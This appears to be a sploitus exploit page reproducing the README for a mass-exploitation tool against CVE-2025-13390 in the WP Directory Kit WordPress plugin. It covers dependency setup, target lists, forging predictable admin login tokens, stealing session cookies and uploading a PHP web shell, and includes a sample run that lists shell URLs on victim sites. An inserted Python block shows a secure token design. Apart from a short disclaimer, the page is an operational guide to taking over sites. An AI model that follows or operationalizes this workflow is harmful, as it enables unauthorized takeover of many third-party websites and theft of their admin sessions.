## https://sploitus.com/exploit?id=55B9AD0C-1232-505A-8605-4F82EAD9EF54
# CVE-2025-13390
WP Directory Kit <= 1.4.4 - Authentication Bypass to Privilege Escalation via Account Takeover
# CVE-2025-13390: WordPress WP Directory Kit Authentication Bypass & Remote Code Execution
## Description
> **The WP Directory Kit plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.4.4 due to incorrect implementation of the authentication algorithm in the `wdk_generate_auto_login_link` function.**
>
> This is due to the feature using a cryptographically weak token generation mechanism. This flaw makes it possible for **unauthenticated attackers** to gain administrative access and **achieve full site takeover** via the auto-login endpoint with a predictable token.
>
> - **CNA:** Wordfence
> - **Base Score:** 10.0 CRITICAL
> - **Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
---
## Exploit Features
- **Cookie Extraction:** Efficient automatic extraction of WordPress authentication cookies.
- **Plugin Uploader:** Remote plugin (ZIP) upload with direct shell deployment (expects shell named `Nx.php`).
- **Fully Automated:** Uses multi-threading for blazing fast exploitation across a large list of targets.
- **Detailed Logging:** Results are clearly split into successful cookies, shells, and a full upload log.
- **Customizable:** User can set threads, target user ID, token, custom ZIP/plugin names, and more for stealthy/personalized attacks.
- **Banner & Usage Guides:** Professional UI with clear prompts for each required variable.
---
## How The Vulnerability Works
1. **Weak Token Generation:** The plugin uses insecure, easily predictable logic to generate one-click login tokens based on user IDs.
2. **Predictable Auth Bypass:** The attacker generates the token for any user (default: ID 1 = admin) and requests an auto-login link.
3. **Session Hijack:** On success, the script extracts valid admin session cookies.
4. **Remote Plugin Upload:** Using the admin cookies, it uploads a malicious ZIP (a plugin containing a PHP shell).
5. **Full Site Takeover:** Shell access is provided via the predictable plugin path (`Nx.php`).
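The root cause above is a login token that can be derived from something the attacker already knows (the user ID). For comparison, the following is an added illustration of what a one-click login token scheme needs in order not to have that property; it is not code from WP Directory Kit or from the exploit script described on this page. The storage class is a constructed in-memory stand-in, and the TTL and failure threshold are assumed policy values, not values taken from the plugin.

```python
import hashlib
import hmac
import secrets
import time

# Assumed policy values for this illustration, not taken from the plugin.
TOKEN_TTL_SECONDS = 600      # a login link should stop working quickly
ALERT_AFTER_FAILURES = 5     # flag a user after this many bad tokens


def _digest(token: str) -> str:
    """Hash the token so a database read does not yield usable tokens."""
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


class LoginTokenStore:
    """Constructed in-memory stand-in for a plugin's persistence layer."""

    def __init__(self):
        # user_id -> (sha256 hex of the token, expiry as unix time)
        self._records = {}
        # user_id -> number of failed redemptions, kept for detection
        self.failures = {}

    def issue(self, user_id: int, now=None) -> str:
        """Create a single-use login token bound to one user.

        The token is 32 bytes from the OS CSPRNG, so nothing an
        unauthenticated party knows (the user ID included) lets them
        compute it. Issuing again replaces the previous token.
        """
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        self._records[user_id] = (_digest(token), now + TOKEN_TTL_SECONDS)
        return token

    def redeem(self, user_id: int, token: str, now=None) -> bool:
        """Validate and consume a token; True means the login may proceed."""
        now = time.time() if now is None else now
        record = self._records.get(user_id)
        if record is None:
            return self._fail(user_id)
        stored_digest, expires_at = record
        if now > expires_at:
            # Expired tokens are dropped so they cannot be retried later.
            del self._records[user_id]
            return self._fail(user_id)
        if not hmac.compare_digest(stored_digest, _digest(token)):
            # Constant-time comparison: no timing signal about matching prefixes.
            return self._fail(user_id)
        # Single use: a redeemed token can never log in again.
        del self._records[user_id]
        self.failures.pop(user_id, None)
        return True

    def _fail(self, user_id: int) -> bool:
        self.failures[user_id] = self.failures.get(user_id, 0) + 1
        return False

    def suspicious_users(self):
        """User IDs whose auto-login endpoint has seen repeated bad tokens.

        Repeated failures against one account are the signal a site owner
        would alert on; with random tokens, guessing cannot succeed, so the
        attempts only show up here.
        """
        return sorted(u for u, n in self.failures.items()
                      if n >= ALERT_AFTER_FAILURES)
```

Each of the four properties (random token, hashed at rest, time-limited, single use) closes a different avenue: a token derived from the user ID fails the first one outright, which is the weakness this advisory describes, and the failure counter gives the defender something to monitor even when the tokens themselves are sound.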
---
## Usage Instructions
### 1. Install Required Dependencies
```bash
pip install -r requirements.txt
# Or individually:
pip install requests beautifulsoup4 colorama
```
### 2. Prepare Your Payload
- **Default ZIP:** The script expects a ZIP file (`Nxploited.zip`) containing your shell named **Nx.php** in the root.
- **Custom Plugin Name:** You can specify another ZIP/plugin folder in the menu.
### 3. Create List of Targets
- Prepare a list file (default: `list.txt`) with one URL/host per line.
- Hosts can include a scheme (`http(s)://`) or be bare domains/IPs.
```txt
http://vuln-site1.tld
https://vuln-site2.tld
192.168.56.101
```

### 4. Run the Exploit
```bash
python3 CVE-2025-13390.py
```
- The script presents an interactive menu:
  - **Targets file:** Defaults to `list.txt`
  - **Threads:** Highly recommended to keep at 8+ for speed
  - **Target user ID:** Defaults to admin (1)
  - **Token:** Will auto-suggest a valid predictable token for the user ID
  - **ZIP path:** Defaults to `Nxploited.zip`
  - **Plugin folder name:** Auto-extracted from the ZIP; you can customize it
### 5. Result Files
- `success_cookies.txt`: Sites where admin cookies were successfully extracted.
- `success_shells.txt`: URLs of successfully uploaded shells.
- `uploads_log.txt`: Full log of plugin upload attempts.
---
## Example Run
```
_______ __ __ _______ _______ _______ _______ _______ ____ _______ _______ _______ _______
| || | | || | | || _ || || | | | | || || _ || _ |
| || |_| || ___| ____ |____ || | | ||____ || ____| ____ | | |___ ||___ || | | || | | |
| || || |___ |____| ____| || | | | ____| || |____ |____| | | ___| | ___| || |_| || | | |
| _|| || ___| | ______|| |_| || ______||_____ | | | |___ ||___ ||___ || |_| |
| |_ | | | |___ | |_____ | || |_____ _____| | | | ___| | ___| | | || |
|_______| |___| |_______| |_______||_______||_______||_______| |___| |_______||_______| |___||_______|
By: Nxploited (Khaled ALenazi)
Telegram: @Nxploited
GitHub: https://github.com/Nxploited
Professional WordPress cookie exploit & plugin uploader.
Features: Extracts login cookies, uploads plugin (default: Nxploited.zip), expects shell as Nx.php.
Results: Successful shells in success_shells.txt, successful cookies in success_cookies.txt.
Highly automated. Multi-threaded. For authorized auditing only.
Targets file [default: list.txt]:
Threads [default: 8]:
Target user ID [default: 1]:
Token [default: a1b2c3d4e5]:
Plugin ZIP file path [default: Nxploited.zip]:
Plugin folder name? [default: Nxploited]:
Reminder: Ensure your shell file INSIDE the plugin ZIP is named Nx.php.
Loaded 42 targets, 8 threads.
...
[SUCCESS] http://victim.com: Cookie extracted
[SHELL] http://victim.com/wp-content/plugins/Nxploited/Nx.php
...
Done. Shell URLs in success_shells.txt, cookies in success_cookies.txt.
```
---
## Arguments & Customization
- **Targets file:** Any txt file (one host per line)
- **Threads:** Integer (`8`, `16`, etc.)
- **User ID:** WordPress user integer (typically `1` = admin)
- **Token:** Leave blank for smart auto-generation
- **ZIP path:** Path to your plugin payload
- **Plugin folder:** The subfolder under `/wp-content/plugins/` for your payload (default taken from zip name)
---
## Ethical Notice & Disclaimer
- **For authorized auditing and educational purposes only.**
- The tool is provided "as is" for risk assessment and penetration testing by authorized personnel solely.
- You must have explicit permission before testing any system with this tool.
- **Developer assumes no liability for misuse or damage.**
---
## Author & Contact
- By: Nxploited (Khaled ALenazi)
- Telegram: [@Nxploited](https://t.me/Nxploited)
- GitHub: [https://github.com/Nxploited](https://github.com/Nxploited)
- #Nxploited
---
## References
- [Wordfence Advisory](https://www.wordfence.com/)
- [CVE-2025-13390](https://vulners.com/cve/CVE-2025-13390)
---